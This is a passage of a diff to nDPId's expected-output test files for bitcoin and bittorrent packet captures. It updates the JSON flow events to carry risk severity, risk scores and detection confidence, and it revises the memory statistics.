-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328699728,"flow_last_seen":1301328743741,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":33744,"flow_avg_l4_payload_len":1054,"midstream":1,"ts_msec":1301328743741,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00769{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":390,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328699728,"flow_last_seen":1301328743741,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":33744,"flow_avg_l4_payload_len":1054,"midstream":1,"ts_msec":1301328743741,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328699728,"flow_last_seen":1301328743741,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":33744,"flow_avg_l4_payload_len":1054,"midstream":1,"ts_msec":1301328743741,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"}
 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00766{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00770{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","total-events-serialized":42}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 637/637
@@ -48,9 +48,9 @@
 ~~ total active/idle flows...: 6/6
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5665213 bytes
-~~ total memory freed........: 5665213 bytes
-~~ total allocations/frees...: 100283/100283
+~~ total memory allocated....: 5748190 bytes
+~~ total memory freed........: 5748190 bytes
+~~ total allocations/frees...: 101873/101873
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 1826 chars
diff --git a/test/results/bittorrent.pcap.out b/test/results/bittorrent.pcap.out
index d7898fa6c..632b76a70 100644
--- a/test/results/bittorrent.pcap.out
+++ b/test/results/bittorrent.pcap.out
@@ -1,62 +1,62 @@
 00442{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bittorrent.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 01337{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
+00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="}
 01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
